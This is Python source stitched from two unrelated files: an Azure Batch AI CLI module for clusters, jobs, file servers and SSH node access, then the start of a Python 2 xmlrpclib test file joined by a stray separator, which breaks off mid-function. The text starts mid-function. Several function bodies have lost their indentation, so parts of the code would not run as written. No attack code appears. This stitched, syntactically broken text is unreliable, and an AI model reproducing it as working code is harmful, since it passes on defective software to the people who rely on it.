            params.node_setup = models.NodeSetup()
        params.node_setup.mount_volumes = mount_volumes
    if subnet:
        params.subnet = models.ResourceId(id=subnet)
    if setup_task:
        params = _add_setup_task(setup_task, setup_task_output, params)
    return client.clusters.create(resource_group, workspace_name, cluster_name, params)
def list_clusters(client, resource_group, workspace_name):
    """Return all clusters of the given workspace as a list."""
    clusters = client.list_by_workspace(resource_group, workspace_name)
    return list(clusters)
def resize_cluster(client, resource_group, workspace_name, cluster_name, target):
    """Switch the cluster to manual scaling with the given target node count."""
    manual = models.ManualScaleSettings(target_node_count=target)
    scale = models.ScaleSettings(manual=manual)
    return client.update(resource_group, workspace_name, cluster_name, scale_settings=scale)
def set_cluster_auto_scale_parameters(client, resource_group, workspace_name, cluster_name, min_nodes, max_nodes):
    """Switch the cluster to auto-scaling within [min_nodes, max_nodes]."""
    auto = models.AutoScaleSettings(minimum_node_count=min_nodes, maximum_node_count=max_nodes)
    return client.update(resource_group, workspace_name, cluster_name,
                         scale_settings=models.ScaleSettings(auto_scale=auto))
def _is_on_mount_point(path, mount_path):
"""Checks if path is on mount_path"""
path = os.path.normpath(path).replace('\\', '/')
mount_path = os.path.normpath(mount_path).replace('\\', '/')
return path == mount_path or os.path.commonprefix([path, mount_path + '/']) == mount_path + '/'
def list_node_setup_files(cmd, client, resource_group, workspace_name, cluster_name, path='.',
                          expiry=DEFAULT_URL_EXPIRY_MIN):
    """List the setup-task output files and folders for the given cluster."""
    return _list_node_setup_files_for_cluster(
        cmd.cli_ctx, client.get(resource_group, workspace_name, cluster_name), path, expiry)
def _list_node_setup_files_for_cluster(cli_ctx, cluster, path, expiry):
    """Lists node setup task's log files for the given cluster.

    Works only when the setup task stored its output under $AZ_BATCHAI_MOUNT_ROOT
    on a mounted Azure File share or blob container the CLI can reach directly.

    :param models.Cluster cluster: the cluster.
    :param str path: relative path under cluster node setup task's output directory.
    :param int expiry: time in minutes for how long generated SASes will remain valid.
    """
    unsupported_location = 'List files is supported only for clusters with startup task configure to store its ' \
                           'output on Azure File Share or Azure Blob Container'
    if cluster.node_setup is None or cluster.node_setup.setup_task is None:
        # Nothing to check or return if there is no setup task.
        return []
    prefix = cluster.node_setup.setup_task.std_out_err_path_prefix
    if not _is_on_mount_point(prefix, '$AZ_BATCHAI_MOUNT_ROOT'):
        # The stdouterr directory must be on $AZ_BATCHAI_MOUNT_ROOT
        raise CLIError(unsupported_location)
    suffix = cluster.node_setup.setup_task.std_out_err_path_suffix
    if not suffix:
        # Clusters created with older API version do not report the path suffix, so we cannot find their files.
        raise CLIError('List files is not supported for this cluster')
    # Path of the output folder relative to the mount root, e.g. 'afs/...'.
    relative_mount_path = prefix[len('$AZ_BATCHAI_MOUNT_ROOT/'):]
    if cluster.node_setup.mount_volumes is None:
        # If nothing is mounted, the files were stored somewhere else and we cannot find them.
        raise CLIError(unsupported_location)
    # try mounted Azure file shares
    for afs in cluster.node_setup.mount_volumes.azure_file_shares or []:
        if _is_on_mount_point(relative_mount_path, afs.relative_mount_path):
            return _get_files_from_afs(cli_ctx, afs, os.path.join(suffix, path), expiry)
    # try mounted blob containers
    for bfs in cluster.node_setup.mount_volumes.azure_blob_file_systems or []:
        if _is_on_mount_point(relative_mount_path, bfs.relative_mount_path):
            return _get_files_from_bfs(cli_ctx, bfs, os.path.join(suffix, path), expiry)
    # the folder on some other file system or on local disk
    raise CLIError(unsupported_location)
def _get_files_from_bfs(cli_ctx, bfs, path, expiry):
    """Returns a list of files and directories under given path on mounted blob container.

    :param models.AzureBlobFileSystemReference bfs: blob file system reference.
    :param str path: path to list files from.
    :param int expiry: SAS expiration time in minutes.
    """
    from azure.storage.blob import BlockBlobService
    from azure.storage.blob.models import Blob, BlobPermissions
    result = []
    service = BlockBlobService(bfs.account_name, _get_storage_account_key(cli_ctx, bfs.account_name, None))
    effective_path = _get_path_for_storage(path)
    folders = set()
    # With delimiter='/', list_blobs yields Blob objects for files plus
    # prefix objects for virtual sub-folders.
    for b in service.list_blobs(bfs.container_name, effective_path + '/', delimiter='/'):
        if isinstance(b, Blob):
            name = os.path.basename(b.name)
            # Read-only SAS so the returned download URL works without the account key.
            sas = service.generate_blob_shared_access_signature(
                bfs.container_name, b.name, BlobPermissions(read=True),
                expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
            result.append(
                LogFile(
                    name, service.make_blob_url(bfs.container_name, b.name, 'https', sas),
                    False, b.properties.content_length))
        else:
            # Prefix names end with '/', so the folder's own name is the
            # second-to-last path component.
            name = b.name.split('/')[-2]
            folders.add(name)
            result.append(LogFile(name, None, True, None))
    # Drop file entries whose name collides with a folder name;
    # NOTE(review): presumably removes zero-byte folder placeholder blobs — confirm.
    result = [f for f in result if f.is_directory or f.name not in folders]
    return result
def _get_path_for_storage(path):
"""Returns a path in format acceptable for passing to storage"""
result = os.path.normpath(path).replace('\\', '/')
if result.endswith('/.'):
result = result[:-2]
return result
def _get_files_from_afs(cli_ctx, afs, path, expiry):
    """Returns a list of files and directories under given path on mounted Azure File share.

    :param models.AzureFileShareReference afs: Azure file share reference.
    :param str path: path to list files from.
    :param int expiry: SAS expiration time in minutes.
    """
    FileService, File, FilePermissions = get_sdk(cli_ctx, ResourceType.DATA_STORAGE,
                                                 'file#FileService', 'file.models#File', 'file.models#FilePermissions')
    result = []
    service = FileService(afs.account_name, _get_storage_account_key(cli_ctx, afs.account_name, None))
    # The share name is the last segment of the share's URL.
    share_name = afs.azure_file_url.split('/')[-1]
    effective_path = _get_path_for_storage(path)
    if not service.exists(share_name, effective_path):
        # The requested directory was never created; report no files.
        return result
    for f in service.list_directories_and_files(share_name, effective_path):
        if isinstance(f, File):
            # Read-only SAS so the returned download URL works without the account key.
            sas = service.generate_file_shared_access_signature(
                share_name, effective_path, f.name, permission=FilePermissions(read=True),
                expiry=datetime.datetime.utcnow() + datetime.timedelta(minutes=expiry))
            result.append(
                LogFile(
                    f.name, service.make_file_url(share_name, effective_path, f.name, 'https', sas),
                    False, f.properties.content_length))
        else:
            # Directory entry: no download URL and no size.
            result.append(LogFile(f.name, None, True, None))
    return result
def create_job(cmd, # pylint: disable=too-many-locals
               client, resource_group, workspace_name, experiment_name, job_name, json_file,
               cluster, nfs=None, nfs_mount_path='nfs', azure_file_share=None, afs_mount_path='afs',
               container_name=None, container_mount_path='bfs', account_name=None, account_key=None):
    """Creates a job in the given experiment.

    The job definition is read from json_file; the execution cluster and extra
    mount volumes (NFS, Azure File share, blob container) may be supplied or
    overridden via the command line arguments.
    """
    _ensure_job_not_exist(client.jobs, resource_group, workspace_name, experiment_name, job_name)
    with open(json_file) as f:
        json_obj = json.load(f)
        params = _get_deserializer()('JobCreateParameters', json_obj)  # type: models.JobCreateParameters
    # If cluster is not configured via command line, let's get it from the config file.
    if not cluster:
        cluster = params.cluster.id
    if not cluster:
        raise CLIError('Please provide cluster information via command line or configuration file.')
    cluster_resource_group, cluster_workspace, cluster_name = _get_effective_resource_parameters(
        cluster, resource_group, workspace_name)
    # Check presence of the cluster.
    existing_cluster = client.clusters.get(cluster_resource_group, cluster_workspace, cluster_name)
    params.cluster = models.ResourceId(id=existing_cluster.id)
    # Update credentials and other parameters for mount volumes configured via config file.
    if params.mount_volumes:
        params.mount_volumes = _patch_mount_volumes(
            cmd.cli_ctx, params.mount_volumes, account_name, account_key)
    # Create mount volumes if required
    if nfs or azure_file_share or container_name:
        params.mount_volumes = params.mount_volumes or models.MountVolumes()
    mount_volumes = params.mount_volumes
    # Add NFS into mount volumes
    if nfs:
        nfs_resource_group, nfs_workspace, nfs_name = _get_effective_resource_parameters(
            nfs, resource_group, workspace_name)
        file_server = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
        mount_volumes = _add_nfs_to_mount_volumes(mount_volumes, file_server.id, nfs_mount_path)
    # Add Azure File Share into mount volumes.
    if azure_file_share:
        mount_volumes = _add_azure_file_share_to_mount_volumes(cmd.cli_ctx, mount_volumes, azure_file_share,
                                                               afs_mount_path, account_name, account_key)
    # Add Blob Container into mount volumes.
    if container_name:
        mount_volumes = _add_azure_container_to_mount_volumes(cmd.cli_ctx, mount_volumes, container_name,
                                                              container_mount_path, account_name, account_key)
    params.mount_volumes = mount_volumes
    return client.jobs.create(resource_group, workspace_name, experiment_name, job_name, params)
def list_files(client, resource_group, workspace_name, experiment_name, job_name,
               output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.',
               expiry=DEFAULT_URL_EXPIRY_MIN):
    """List a job's output files under the given output directory and relative path."""
    options = models.JobsListOutputFilesOptions(outputdirectoryid=output_directory_id,
                                                directory=path,
                                                linkexpiryinminutes=expiry)
    files = client.list_output_files(resource_group, workspace_name, experiment_name, job_name, options)
    return list(files)
def sigint_handler(*_):
    """Ctrl-C handler that terminates the process immediately, skipping cleanup.

    Some libs do not handle KeyboardInterrupt nicely and print junk messages,
    so just exit without any cleanup (no atexit hooks, no stream flushing).
    """
    # noinspection PyProtectedMember
    os._exit(0)  # pylint: disable=protected-access
def tail_file(client, resource_group, workspace_name, experiment_name, job_name, file_name,
              output_directory_id=STANDARD_OUTPUT_DIRECTORY_ID, path='.'):
    """Waits for the given job output file to appear and streams it to stdout
    until the job completes.

    :param str file_name: name of the file to stream.
    :param str output_directory_id: id of the job's output directory to search.
    :param str path: relative path inside the output directory.
    """
    signal.signal(signal.SIGINT, sigint_handler)
    url = None
    # Wait until the file become available.
    reported_absence_of_file = False
    while url is None:
        files = list_files(client, resource_group, workspace_name, experiment_name, job_name, output_directory_id, path)
        for f in files:
            if f.name == file_name:
                url = f.download_url
                logger.warning('File found with URL "%s". Start streaming', url)
                break
        if url is None:
            job = client.get(resource_group, workspace_name, experiment_name, job_name)
            if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
                # The job finished without producing the file; stop waiting.
                break
            if not reported_absence_of_file:
                logger.warning('The file "%s" not found. Waiting for the job to generate it.', file_name)
                reported_absence_of_file = True
            time.sleep(1)
    if url is None:
        logger.warning('The file "%s" not found for the completed job.', file_name)
        return
    # Stream the file
    downloaded = 0
    while True:
        # The Range header fetches only the bytes appended since the last poll;
        # a non-2xx reply (e.g. 416 when nothing new is available) is retried.
        r = requests.get(url, headers={'Range': 'bytes={0}-'.format(downloaded)})
        if int(r.status_code / 100) == 2:
            downloaded += len(r.content)
            print(r.content.decode(), end='')
        job = client.get(resource_group, workspace_name, experiment_name, job_name)
        if job.execution_state in [models.ExecutionState.succeeded, models.ExecutionState.failed]:
            break
        time.sleep(1)
def wait_for_job_completion(client, resource_group, workspace_name, experiment_name, job_name, check_interval_sec=15):
    """Polls the job until it succeeds or fails, logging state transitions.

    Exits the process via sys.exit when the job fails.

    :param int check_interval_sec: polling interval in seconds.
    """
    job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)  # type: models.Job
    logger.warning('Job submitted at %s', str(job.creation_time))
    last_state = None
    reported_job_start_time = False
    while True:
        info = job.execution_info  # type: models.JobPropertiesExecutionInfo
        if info and not reported_job_start_time:
            logger.warning('Job started execution at %s', str(info.start_time))
            reported_job_start_time = True
        if job.execution_state != last_state:
            # Log only on actual state changes to keep output readable.
            logger.warning('Job state: %s', job.execution_state)
            last_state = job.execution_state
        if job.execution_state == models.ExecutionState.succeeded:
            # NOTE(review): assumes execution_info is populated for succeeded jobs — confirm.
            logger.warning('Job completed at %s; execution took %s', str(info.end_time),
                           str(info.end_time - info.start_time))
            return
        if job.execution_state == models.ExecutionState.failed:
            _log_failed_job(resource_group, job)
            sys.exit(-1)
        time.sleep(check_interval_sec)
        job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)
def _log_failed_job(resource_group, job):
    """Logs diagnostics for a failed job and exits with its exit code.

    :param str resource_group: resource group name
    :param models.Job job: failed job.
    """
    logger.warning('The job "%s" in resource group "%s" failed.', job.name, resource_group)
    info = job.execution_info  # type: models.JobPropertiesExecutionInfo
    if not info:
        logger.warning('Failed job has no execution info')
        return
    logger.warning('Job failed with exit code %d at %s; execution took %s', info.exit_code,
                   str(info.end_time), str(info.end_time - info.start_time))
    for e in info.errors or []:
        details = '<none>'
        if e.details:
            details = '\n' + '\n'.join('{0}: {1}'.format(d.name, d.value) for d in e.details)
        logger.warning('Error message: %s\nDetails:\n %s', e.message, details)
    sys.exit(info.exit_code)
def create_file_server(client, resource_group, workspace, file_server_name, json_file=None, vm_size=None,
                       user_name=None, ssh_key=None, password=None, generate_ssh_keys=None, disk_count=None,
                       disk_size=None, caching_type=None, storage_sku=None, subnet=None, raw=False):
    """Creates a file server in the given workspace.

    Base configuration is read from json_file when provided; explicit command
    line arguments override it. Disk size, disk count, storage sku and VM size
    are mandatory (either via config file or arguments).
    """
    if generate_ssh_keys:
        _generate_ssh_keys()
        if ssh_key is None:
            # Use the key pair that _generate_ssh_keys found or created.
            ssh_key = _get_default_ssh_public_key_location()
    _ensure_resource_not_exist(client.file_servers, resource_group, workspace, file_server_name)
    if json_file:
        with open(json_file) as f:
            json_obj = json.load(f)
            params = _get_deserializer()('FileServerCreateParameters', json_obj)
    else:
        # noinspection PyTypeChecker
        params = models.FileServerCreateParameters(location=None, vm_size=None, ssh_configuration=None, data_disks=None)
    params = _update_user_account_settings(params, user_name, ssh_key, password)
    # File servers are always created in the workspace's region.
    params.location = _get_workspace_location(client, resource_group, workspace)
    if not params.data_disks:
        # noinspection PyTypeChecker
        params.data_disks = models.DataDisks(disk_size_in_gb=None, disk_count=None, storage_account_type=None)
    if disk_size:
        params.data_disks.disk_size_in_gb = disk_size
    if not params.data_disks.disk_size_in_gb:
        raise CLIError('Please provide disk size in Gb.')
    if disk_count:
        params.data_disks.disk_count = disk_count
    if not params.data_disks.disk_count:
        raise CLIError('Please provide number of data disks (at least one disk is required).')
    if caching_type:
        params.data_disks.caching_type = caching_type
    if storage_sku:
        params.data_disks.storage_account_type = storage_sku
    if not params.data_disks.storage_account_type:
        raise CLIError('Please provide storage account type (storage sku).')
    if vm_size:
        params.vm_size = vm_size
    if not params.vm_size:
        raise CLIError('Please provide VM size.')
    if subnet:
        if not is_valid_resource_id(subnet):
            raise CLIError('Ill-formed subnet resource id')
        params.subnet = models.ResourceId(id=subnet)
    return client.file_servers.create(resource_group, workspace, file_server_name, params, raw=raw)
def list_file_servers(client, resource_group, workspace_name):
    """Enumerate the file servers belonging to the given workspace."""
    servers = client.list_by_workspace(resource_group, workspace_name)
    return servers
def _get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def _create_tunnel(remote_host, port, username, password, ssh_private_key, local_addresses, remote_addresses, func):
    """Runs func while an SSH tunnel forwards local_addresses to remote_addresses.

    :param str remote_host: ip or address of the remote host
    :param int port: the ssh port number
    :param str username: username to login under
    :param str or None password: the user password
    :param str or None ssh_private_key: the path to private ssh key
    :param local_addresses: local addresses to be forwarded
    :param remote_addresses: target addresses
    :param func: callable executed while forwarding is active; forwarding stops when it returns.
    """
    from sshtunnel import SSHTunnelForwarder
    # Replace any requested port 0 with a concrete free local port.
    resolved = []
    for host, local_port in local_addresses:
        if local_port == 0:
            local_port = _get_available_local_port()
        resolved.append((host, local_port))
    forwarder = SSHTunnelForwarder((remote_host, port),
                                   ssh_username=username,
                                   ssh_password=password,
                                   ssh_pkey=ssh_private_key,
                                   remote_bind_addresses=remote_addresses,
                                   local_bind_addresses=resolved)
    with forwarder:
        func()
def _ssh_exec(ip, port, cmdline, username, password, ssh_private_key):
    """Executes the given cmdline on the provided host under given credentials.

    Streams the remote command's stdout and stderr to the local stdout until
    the command finishes.

    :param str ip: ip address
    :param int port: the ssh port number
    :param str cmdline: command line to execute
    :param str username: username to login
    :param str or None password: the user password
    :param str or None ssh_private_key: the path to the private ssh key
    """
    ssh = paramiko.SSHClient()
    # Accept unknown host keys: cluster nodes are ephemeral and not in known_hosts.
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    ssh.connect(ip, port, username, password=password, key_filename=ssh_private_key)
    transport = ssh.get_transport()
    # Send keepalives so long-running remote commands don't drop the connection.
    transport.set_keepalive(15)
    # Run under an interactive login shell so the user's environment is loaded.
    _, out, err = ssh.exec_command('bash -ilc "{}"'.format(cmdline), get_pty=True)
    output_lock = threading.Lock()
    def _worker(s):
        # Copy one remote stream to stdout; the lock keeps stdout and stderr
        # lines from interleaving mid-write.
        for l in s:
            with output_lock:
                print(l, end='')
    threads = [threading.Thread(target=_worker, args=(s,)) for s in [out, err]]
    for t in threads:
        t.start()
    # On Windows thread.join() call prevents the master thread from handling Ctrl-C, so we are joining with timeout.
    # NOTE(review): this returns as soon as EITHER stream's thread finishes;
    # the other stream may still have pending output — confirm this is intended.
    while True:
        for t in threads:
            t.join(timeout=1)
            if not t.is_alive():
                return
def exec_on_node(client, resource_group, workspace_name, cluster_name, node_id=None, ports=None, cmdline=None,
                 password=None, ssh_private_key=None):
    """Executes a command and/or sets up port forwarding on a cluster node.

    :param str node_id: id of the node to connect to; the first node is used when omitted.
    :param ports: list of 'local_port:remote_host:remote_port' forwarding specs.
    :param str cmdline: command to execute remotely; when ports are given
        without cmdline, forwarding runs until interrupted.
    :param str or None password: the user password.
    :param str or None ssh_private_key: path to the private ssh key.
    """
    from sshtunnel import BaseSSHTunnelForwarderError
    if not any((cmdline, ports)):
        # Nothing to execute and nothing to forward.
        return
    ip, port = None, None
    if node_id:
        for n in client.list_remote_login_information(resource_group, workspace_name, cluster_name):
            if n.node_id == node_id:
                ip = n.ip_address
                port = int(n.port)
        if ip is None:
            raise CLIError('Cannot find a node with id={0}'.format(node_id))
    else:
        nodes = list(client.list_remote_login_information(resource_group, workspace_name, cluster_name))
        if not nodes:
            raise CLIError('No nodes available in the cluster')
        ip = nodes[0].ip_address
        port = int(nodes[0].port)
    cluster = client.get(resource_group, workspace_name, cluster_name)  # type: models.Cluster
    username = cluster.user_account_settings.admin_user_name
    try:
        signal.signal(signal.SIGINT, sigint_handler)
        if ports:
            # Split 'local:remote_host:remote_port' into local and remote bind addresses.
            local_addresses = [('0.0.0.0', int(p.split(':')[0])) for p in ports]
            remote_addresses = [(p.split(':')[1], int(p.split(':')[2])) for p in ports]
            if cmdline:
                func = partial(_ssh_exec, ip, port, cmdline, username, password, ssh_private_key)
            else:
                def _sleep():
                    # Keep the tunnel open until the user interrupts with Ctrl-C.
                    while True:
                        time.sleep(1)
                func = _sleep
            _create_tunnel(ip, port, username, password, ssh_private_key,
                           local_addresses, remote_addresses, func)
        else:
            _ssh_exec(ip, port, cmdline, username, password, ssh_private_key)
    except (BaseSSHTunnelForwarderError, paramiko.ssh_exception.AuthenticationException) as e:
        raise CLIError('Connection to remote host failed. Please check provided credentials. Error: {0}'.format(e))
def exec_on_job_node(client, resource_group, workspace_name, experiment_name, job_name, node_id=None, ports=None,
                     cmdline=None, password=None, ssh_private_key=None):
    """Runs a command and/or sets up port forwarding on a node executing the given job."""
    if not cmdline and not ports:
        # Nothing to execute and nothing to forward.
        return
    if not node_id:
        # Default to the first node the job is running on.
        login_info = list(client.jobs.list_remote_login_information(
            resource_group, workspace_name, experiment_name, job_name))
        if not login_info:
            raise CLIError('No nodes available in the cluster')
        node_id = login_info[0].node_id
    # Locate the cluster the job runs on from the job's cluster resource id.
    job = client.jobs.get(resource_group, workspace_name, experiment_name, job_name)  # type: models.Job
    parts = parse_resource_id(job.cluster.id)
    exec_on_node(client.clusters, parts['resource_group'], parts['name'], parts['resource_name'],
                 node_id, ports, cmdline, password, ssh_private_key)
|
test_xmlrpc.py | import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import mimetools
import httplib
import socket
import StringIO
import os
import re
from test import test_support
try:
import threading
except ImportError:
threading = None
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
# Sample payload exercising every marshallable type supported by xmlrpclib:
# string, float, int, long, nested list, Binary, boolean, unicode value,
# unicode dict key and the three ways of constructing a DateTime.
alist = [{'astring': 'foo@bar.baz.spam',
          'afloat': 7283.43,
          'anint': 2**20,
          'ashortlong': 2L,
          'anotherlist': ['.zyx.41'],
          'abase64': xmlrpclib.Binary("my dog has fleas"),
          'boolean': xmlrpclib.False,
          'unicode': u'\u4000\u6000\u8000',
          u'ukey\u4000': 'regular value',
          'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
          'datetime2': xmlrpclib.DateTime(
                        (2005, 02, 10, 11, 41, 23, 0, 1, -1)),
          'datetime3': xmlrpclib.DateTime(
                        datetime.datetime(2005, 02, 10, 11, 41, 23)),
          }]
class XMLRPCTestCase(unittest.TestCase):
    """Round-trip (dumps/loads) and marshalling-limit tests for xmlrpclib."""
    def test_dump_load(self):
        # dumps() followed by loads() of the full sample payload must be lossless.
        self.assertEquals(alist,
                          xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
    def test_dump_bare_datetime(self):
        # This checks that an unwrapped datetime.date object can be handled
        # by the marshalling code. This can't be done via test_dump_load()
        # since with use_datetime set to 1 the unmarshaller would create
        # datetime objects for the 'datetime[123]' keys as well
        dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
        s = xmlrpclib.dumps((dt,))
        (newdt,), m = xmlrpclib.loads(s, use_datetime=1)
        self.assertEquals(newdt, dt)
        self.assertEquals(m, None)
        (newdt,), m = xmlrpclib.loads(s, use_datetime=0)
        self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
    def test_datetime_before_1900(self):
        # same as before but with a date before 1900
        dt = datetime.datetime(1, 02, 10, 11, 41, 23)
        s = xmlrpclib.dumps((dt,))
        (newdt,), m = xmlrpclib.loads(s, use_datetime=1)
        self.assertEquals(newdt, dt)
        self.assertEquals(m, None)
        (newdt,), m = xmlrpclib.loads(s, use_datetime=0)
        self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
    def test_cmp_datetime_DateTime(self):
        # DateTime must compare symmetrically with datetime.datetime.
        now = datetime.datetime.now()
        dt = xmlrpclib.DateTime(now.timetuple())
        self.assertTrue(dt == now)
        self.assertTrue(now == dt)
        then = now + datetime.timedelta(seconds=4)
        self.assertTrue(then >= dt)
        self.assertTrue(dt < then)
    def test_bug_1164912 (self):
        d = xmlrpclib.DateTime()
        ((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
                                            methodresponse=True))
        self.assertIsInstance(new_d.value, str)
        # Check that the output of dumps() is still an 8-bit string
        s = xmlrpclib.dumps((new_d,), methodresponse=True)
        self.assertIsInstance(s, str)
    def test_newstyle_class(self):
        # New-style class instances marshal as their __dict__.
        class T(object):
            pass
        t = T()
        t.x = 100
        t.y = "Hello"
        ((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
        self.assertEquals(t2, t.__dict__)
    def test_dump_big_long(self):
        # Values outside the 32-bit XML-RPC int range must be rejected.
        self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
    def test_dump_bad_dict(self):
        # Only string keys are marshallable.
        self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
    def test_dump_recursive_seq(self):
        # Self-referencing containers must be rejected, not recursed forever.
        l = [1,2,3]
        t = [3,4,5,l]
        l.append(t)
        self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
    def test_dump_recursive_dict(self):
        d = {'1':1, '2':1}
        t = {'3':3, 'd':d}
        d['t'] = t
        self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
    def test_dump_big_int(self):
        # MAXINT/MININT are the inclusive bounds for both dumps() and
        # Marshaller.dump_int().
        if sys.maxint > 2L**31-1:
            self.assertRaises(OverflowError, xmlrpclib.dumps,
                              (int(2L**34),))
        xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
        self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
        self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
        def dummy_write(s):
            pass
        m = xmlrpclib.Marshaller()
        m.dump_int(xmlrpclib.MAXINT, dummy_write)
        m.dump_int(xmlrpclib.MININT, dummy_write)
        self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
        self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
    def test_dump_none(self):
        # None marshals only when allow_none=True is passed to dumps().
        value = alist + [None]
        arg1 = (alist + [None],)
        strg = xmlrpclib.dumps(arg1, allow_none=True)
        self.assertEquals(value,
                          xmlrpclib.loads(strg)[0][0])
        self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
    def test_default_encoding_issues(self):
        # SF bug #1115989: wrong decoding in '_stringify'
        utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
                  <params>
                    <param><value>
                      <string>abc \x95</string>
                      </value></param>
                    <param><value>
                      <struct>
                        <member>
                          <name>def \x96</name>
                          <value><string>ghi \x97</string></value>
                        </member>
                      </struct>
                      </value></param>
                  </params>
                  """
        # sys.setdefaultencoding() normally doesn't exist after site.py is
        # loaded. Import a temporary fresh copy to get access to it
        # but then restore the original copy to avoid messing with
        # other potentially modified sys module attributes
        old_encoding = sys.getdefaultencoding()
        with test_support.CleanImport('sys'):
            import sys as temp_sys
            temp_sys.setdefaultencoding("iso-8859-1")
            try:
                (s, d), m = xmlrpclib.loads(utf8)
            finally:
                temp_sys.setdefaultencoding(old_encoding)
        items = d.items()
        if have_unicode:
            self.assertEquals(s, u"abc \x95")
            self.assertIsInstance(s, unicode)
            self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
            self.assertIsInstance(items[0][0], unicode)
            self.assertIsInstance(items[0][1], unicode)
        else:
            self.assertEquals(s, "abc \xc2\x95")
            self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
    """Tests for the xmlrpclib.escape() helper."""
    def test_escape(self):
        # escape() entity-encodes the XML special characters &, < and >.
        # The expected values here had their entities stripped by an
        # HTML-unescaping pass, which made the assertions wrong; restore them.
        self.assertEqual(xmlrpclib.escape("a&b"), "a&amp;b")
        self.assertEqual(xmlrpclib.escape("a<b"), "a&lt;b")
        self.assertEqual(xmlrpclib.escape("a>b"), "a&gt;b")
class FaultTestCase(unittest.TestCase):
    """Tests for xmlrpclib.Fault representation and marshalling."""
    def test_repr(self):
        fault = xmlrpclib.Fault(42, 'Test Fault')
        self.assertEqual(repr(fault), "<Fault 42: 'Test Fault'>")
        # str() and repr() of a Fault are identical.
        self.assertEqual(repr(fault), str(fault))
    def test_dump_fault(self):
        fault = xmlrpclib.Fault(42, 'Test Fault')
        serialized = xmlrpclib.dumps((fault,))
        (loaded,), method = xmlrpclib.loads(serialized)
        self.assertEquals(loaded, {'faultCode': 42, 'faultString': 'Test Fault'})
        self.assertEquals(method, None)
        # A Marshaller-serialized Fault is re-raised by loads().
        serialized = xmlrpclib.Marshaller().dumps(fault)
        self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, serialized)
class DateTimeTestCase(unittest.TestCase):
    """Tests for the xmlrpclib.DateTime wrapper type."""
    def test_default(self):
        # Constructing with no argument must not raise.
        t = xmlrpclib.DateTime()
    def test_time(self):
        d = 1181399930.036952
        t = xmlrpclib.DateTime(d)
        self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
    def test_time_tuple(self):
        d = (2007,6,9,10,38,50,5,160,0)
        t = xmlrpclib.DateTime(d)
        self.assertEqual(str(t), '20070609T10:38:50')
    def test_time_struct(self):
        d = time.localtime(1181399930.036952)
        t = xmlrpclib.DateTime(d)
        self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
    def test_datetime_datetime(self):
        d = datetime.datetime(2007,1,2,3,4,5)
        t = xmlrpclib.DateTime(d)
        self.assertEqual(str(t), '20070102T03:04:05')
    def test_repr(self):
        d = datetime.datetime(2007,1,2,3,4,5)
        t = xmlrpclib.DateTime(d)
        val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
        self.assertEqual(repr(t), val)
    def test_decode(self):
        d = ' 20070908T07:11:13 '
        t1 = xmlrpclib.DateTime()
        t1.decode(d)
        tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
        self.assertEqual(t1, tref)
        t2 = xmlrpclib._datetime(d)
        # Bug fix: this assertion previously re-checked t1, leaving the
        # _datetime() result t2 completely unverified.
        self.assertEqual(t2, tref)
class BinaryTestCase(unittest.TestCase):
    """Tests for the xmlrpclib.Binary wrapper type."""
    def test_default(self):
        # A Binary constructed without data stringifies to the empty string.
        t = xmlrpclib.Binary()
        self.assertEqual(str(t), '')
    def test_string(self):
        # str() of a Binary returns the raw (unencoded) payload.
        d = '\x01\x02\x03abc123\xff\xfe'
        t = xmlrpclib.Binary(d)
        self.assertEqual(str(t), d)
    def test_decode(self):
        # Both Binary.decode() and the _binary() helper must round-trip
        # base64-encoded data back to the original bytes.
        d = '\x01\x02\x03abc123\xff\xfe'
        de = base64.encodestring(d)
        t1 = xmlrpclib.Binary()
        t1.decode(de)
        self.assertEqual(str(t1), d)
        t2 = xmlrpclib._binary(de)
        self.assertEqual(str(t2), d)
# Address info of the currently running test server; filled in by
# http_server()/http_multi_server() and reset (PORT = None) on shutdown.
ADDR = PORT = URL = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests, requestHandler=None):
    """Run a SimpleXMLRPCServer on an ephemeral localhost port.

    Serves up to numrequests requests, publishing the bound address through
    the module globals ADDR/PORT/URL. evt is set once when the server is
    ready and again after shutdown (with PORT reset to None).
    """
    class TestInstanceClass:
        def div(self, x, y):
